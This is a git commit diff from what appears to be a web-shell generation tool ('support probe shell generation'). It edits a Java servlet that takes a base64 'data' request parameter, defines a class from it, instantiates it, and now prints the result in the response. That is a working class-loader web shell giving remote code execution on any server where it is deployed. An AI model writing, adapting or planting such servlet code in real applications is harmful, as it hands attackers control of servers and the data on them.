feat: support probe shell generation

This commit is contained in:
ReaJason
2025-08-13 23:53:40 +08:00
parent 6a4c5a1e96
commit 13be57e66d
304 changed files with 59084 additions and 1454 deletions
@@ -22,7 +22,8 @@ public class Base64ClassLoaderServlet extends ClassLoader implements Servlet {
String data = req.getParameter("data");
try {
byte[] bytes = decodeBase64(data);
defineClass(null, bytes, 0, bytes.length).newInstance();
Object obj = defineClass(null, bytes, 0, bytes.length).newInstance();
res.getWriter().print(obj);
} catch (Exception e) {
throw new RuntimeException(e);
}